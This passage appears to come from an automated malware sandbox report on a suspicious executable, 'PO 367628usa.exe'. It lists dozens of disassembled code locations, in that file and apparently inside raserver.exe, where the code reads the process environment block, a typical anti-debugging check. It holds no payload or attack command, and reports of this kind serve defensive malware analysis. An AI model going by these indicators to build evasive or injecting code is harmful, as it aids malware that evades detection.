Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]	5_2_018C2D8A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C2D8A mov eax, dword ptr fs:[00000030h]	5_2_018C2D8A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]	5_2_018F2581
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]	5_2_018F2581
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]	5_2_018F2581
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2581 mov eax, dword ptr fs:[00000030h]	5_2_018F2581
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FFD9B mov eax, dword ptr fs:[00000030h]	5_2_018FFD9B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FFD9B mov eax, dword ptr fs:[00000030h]	5_2_018FFD9B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F35A1 mov eax, dword ptr fs:[00000030h]	5_2_018F35A1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019905AC mov eax, dword ptr fs:[00000030h]	5_2_019905AC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019905AC mov eax, dword ptr fs:[00000030h]	5_2_019905AC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_018F1DB5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_018F1DB5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_018F1DB5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]	5_2_01946DC9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]	5_2_01946DC9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]	5_2_01946DC9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946DC9 mov ecx, dword ptr fs:[00000030h]	5_2_01946DC9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]	5_2_01946DC9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946DC9 mov eax, dword ptr fs:[00000030h]	5_2_01946DC9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01978DF1 mov eax, dword ptr fs:[00000030h]	5_2_01978DF1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_018DD5E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_018DD5E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0198FDE2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0198FDE2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0198FDE2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0198FDE2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198E539 mov eax, dword ptr fs:[00000030h]	5_2_0198E539
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0194A537 mov eax, dword ptr fs:[00000030h]	5_2_0194A537
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01998D34 mov eax, dword ptr fs:[00000030h]	5_2_01998D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F4D3B mov eax, dword ptr fs:[00000030h]	5_2_018F4D3B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F4D3B mov eax, dword ptr fs:[00000030h]	5_2_018F4D3B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F4D3B mov eax, dword ptr fs:[00000030h]	5_2_018F4D3B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D3D34 mov eax, dword ptr fs:[00000030h]	5_2_018D3D34
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CAD30 mov eax, dword ptr fs:[00000030h]	5_2_018CAD30
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01903D43 mov eax, dword ptr fs:[00000030h]	5_2_01903D43
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01943540 mov eax, dword ptr fs:[00000030h]	5_2_01943540
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01973D40 mov eax, dword ptr fs:[00000030h]	5_2_01973D40
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E7D50 mov eax, dword ptr fs:[00000030h]	5_2_018E7D50
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EC577 mov eax, dword ptr fs:[00000030h]	5_2_018EC577
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EC577 mov eax, dword ptr fs:[00000030h]	5_2_018EC577
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D849B mov eax, dword ptr fs:[00000030h]	5_2_018D849B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01998CD6 mov eax, dword ptr fs:[00000030h]	5_2_01998CD6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019814FB mov eax, dword ptr fs:[00000030h]	5_2_019814FB
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946CF0 mov eax, dword ptr fs:[00000030h]	5_2_01946CF0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946CF0 mov eax, dword ptr fs:[00000030h]	5_2_01946CF0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946CF0 mov eax, dword ptr fs:[00000030h]	5_2_01946CF0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199740D mov eax, dword ptr fs:[00000030h]	5_2_0199740D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199740D mov eax, dword ptr fs:[00000030h]	5_2_0199740D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199740D mov eax, dword ptr fs:[00000030h]	5_2_0199740D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981C06 mov eax, dword ptr fs:[00000030h]	5_2_01981C06
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]	5_2_01946C0A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]	5_2_01946C0A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]	5_2_01946C0A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01946C0A mov eax, dword ptr fs:[00000030h]	5_2_01946C0A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FBC2C mov eax, dword ptr fs:[00000030h]	5_2_018FBC2C
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FA44B mov eax, dword ptr fs:[00000030h]	5_2_018FA44B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195C450 mov eax, dword ptr fs:[00000030h]	5_2_0195C450
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195C450 mov eax, dword ptr fs:[00000030h]	5_2_0195C450
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E746D mov eax, dword ptr fs:[00000030h]	5_2_018E746D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01947794 mov eax, dword ptr fs:[00000030h]	5_2_01947794
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01947794 mov eax, dword ptr fs:[00000030h]	5_2_01947794
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01947794 mov eax, dword ptr fs:[00000030h]	5_2_01947794
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D8794 mov eax, dword ptr fs:[00000030h]	5_2_018D8794
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019037F5 mov eax, dword ptr fs:[00000030h]	5_2_019037F5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FA70E mov eax, dword ptr fs:[00000030h]	5_2_018FA70E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FA70E mov eax, dword ptr fs:[00000030h]	5_2_018FA70E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195FF10 mov eax, dword ptr fs:[00000030h]	5_2_0195FF10
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195FF10 mov eax, dword ptr fs:[00000030h]	5_2_0195FF10
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199070D mov eax, dword ptr fs:[00000030h]	5_2_0199070D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199070D mov eax, dword ptr fs:[00000030h]	5_2_0199070D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EF716 mov eax, dword ptr fs:[00000030h]	5_2_018EF716
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C4F2E mov eax, dword ptr fs:[00000030h]	5_2_018C4F2E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C4F2E mov eax, dword ptr fs:[00000030h]	5_2_018C4F2E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FE730 mov eax, dword ptr fs:[00000030h]	5_2_018FE730
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DEF40 mov eax, dword ptr fs:[00000030h]	5_2_018DEF40
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DFF60 mov eax, dword ptr fs:[00000030h]	5_2_018DFF60
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01998F6A mov eax, dword ptr fs:[00000030h]	5_2_01998F6A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0195FE87 mov eax, dword ptr fs:[00000030h]	5_2_0195FE87
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019446A7 mov eax, dword ptr fs:[00000030h]	5_2_019446A7
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01990EA5 mov eax, dword ptr fs:[00000030h]	5_2_01990EA5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01990EA5 mov eax, dword ptr fs:[00000030h]	5_2_01990EA5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01990EA5 mov eax, dword ptr fs:[00000030h]	5_2_01990EA5
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F36CC mov eax, dword ptr fs:[00000030h]	5_2_018F36CC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01998ED6 mov eax, dword ptr fs:[00000030h]	5_2_01998ED6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0197FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0197FEC0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01908EC7 mov eax, dword ptr fs:[00000030h]	5_2_01908EC7
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F16E0 mov ecx, dword ptr fs:[00000030h]	5_2_018F16E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D76E2 mov eax, dword ptr fs:[00000030h]	5_2_018D76E2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CC600 mov eax, dword ptr fs:[00000030h]	5_2_018CC600
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CC600 mov eax, dword ptr fs:[00000030h]	5_2_018CC600
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CC600 mov eax, dword ptr fs:[00000030h]	5_2_018CC600
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F8E00 mov eax, dword ptr fs:[00000030h]	5_2_018F8E00
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981608 mov eax, dword ptr fs:[00000030h]	5_2_01981608
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FA61C mov eax, dword ptr fs:[00000030h]	5_2_018FA61C
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FA61C mov eax, dword ptr fs:[00000030h]	5_2_018FA61C
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0197FE3F mov eax, dword ptr fs:[00000030h]	5_2_0197FE3F
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CE620 mov eax, dword ptr fs:[00000030h]	5_2_018CE620
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]	5_2_018D7E41
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]	5_2_018D7E41
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]	5_2_018D7E41
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]	5_2_018D7E41
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]	5_2_018D7E41
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D7E41 mov eax, dword ptr fs:[00000030h]	5_2_018D7E41
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198AE44 mov eax, dword ptr fs:[00000030h]	5_2_0198AE44
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198AE44 mov eax, dword ptr fs:[00000030h]	5_2_0198AE44
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D766D mov eax, dword ptr fs:[00000030h]	5_2_018D766D
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]	5_2_018EAE73
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]	5_2_018EAE73
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]	5_2_018EAE73
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]	5_2_018EAE73
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018EAE73 mov eax, dword ptr fs:[00000030h]	5_2_018EAE73
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA8CD6 mov eax, dword ptr fs:[00000030h]	9_2_04CA8CD6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE849B mov eax, dword ptr fs:[00000030h]	9_2_04BE849B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C914FB mov eax, dword ptr fs:[00000030h]	9_2_04C914FB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56CF0 mov eax, dword ptr fs:[00000030h]	9_2_04C56CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56CF0 mov eax, dword ptr fs:[00000030h]	9_2_04C56CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56CF0 mov eax, dword ptr fs:[00000030h]	9_2_04C56CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0A44B mov eax, dword ptr fs:[00000030h]	9_2_04C0A44B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6C450 mov eax, dword ptr fs:[00000030h]	9_2_04C6C450
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C6C450 mov eax, dword ptr fs:[00000030h]	9_2_04C6C450
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA740D mov eax, dword ptr fs:[00000030h]	9_2_04CA740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA740D mov eax, dword ptr fs:[00000030h]	9_2_04CA740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA740D mov eax, dword ptr fs:[00000030h]	9_2_04CA740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91C06 mov eax, dword ptr fs:[00000030h]	9_2_04C91C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]	9_2_04C56C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]	9_2_04C56C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]	9_2_04C56C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56C0A mov eax, dword ptr fs:[00000030h]	9_2_04C56C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF746D mov eax, dword ptr fs:[00000030h]	9_2_04BF746D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0BC2C mov eax, dword ptr fs:[00000030h]	9_2_04C0BC2C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]	9_2_04C56DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]	9_2_04C56DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]	9_2_04C56DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56DC9 mov ecx, dword ptr fs:[00000030h]	9_2_04C56DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]	9_2_04C56DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C56DC9 mov eax, dword ptr fs:[00000030h]	9_2_04C56DC9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04C9FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04C9FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04C9FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04C9FDE2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]	9_2_04BD2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]	9_2_04BD2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]	9_2_04BD2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]	9_2_04BD2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD2D8A mov eax, dword ptr fs:[00000030h]	9_2_04BD2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C88DF1 mov eax, dword ptr fs:[00000030h]	9_2_04C88DF1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]	9_2_04C02581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]	9_2_04C02581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]	9_2_04C02581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02581 mov eax, dword ptr fs:[00000030h]	9_2_04C02581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0FD9B mov eax, dword ptr fs:[00000030h]	9_2_04C0FD9B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0FD9B mov eax, dword ptr fs:[00000030h]	9_2_04C0FD9B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BED5E0 mov eax, dword ptr fs:[00000030h]	9_2_04BED5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BED5E0 mov eax, dword ptr fs:[00000030h]	9_2_04BED5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C035A1 mov eax, dword ptr fs:[00000030h]	9_2_04C035A1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA05AC mov eax, dword ptr fs:[00000030h]	9_2_04CA05AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA05AC mov eax, dword ptr fs:[00000030h]	9_2_04CA05AC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C01DB5 mov eax, dword ptr fs:[00000030h]	9_2_04C01DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C01DB5 mov eax, dword ptr fs:[00000030h]	9_2_04C01DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C01DB5 mov eax, dword ptr fs:[00000030h]	9_2_04C01DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C13D43 mov eax, dword ptr fs:[00000030h]	9_2_04C13D43
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C53540 mov eax, dword ptr fs:[00000030h]	9_2_04C53540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C83D40 mov eax, dword ptr fs:[00000030h]	9_2_04C83D40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE3D34 mov eax, dword ptr fs:[00000030h]	9_2_04BE3D34
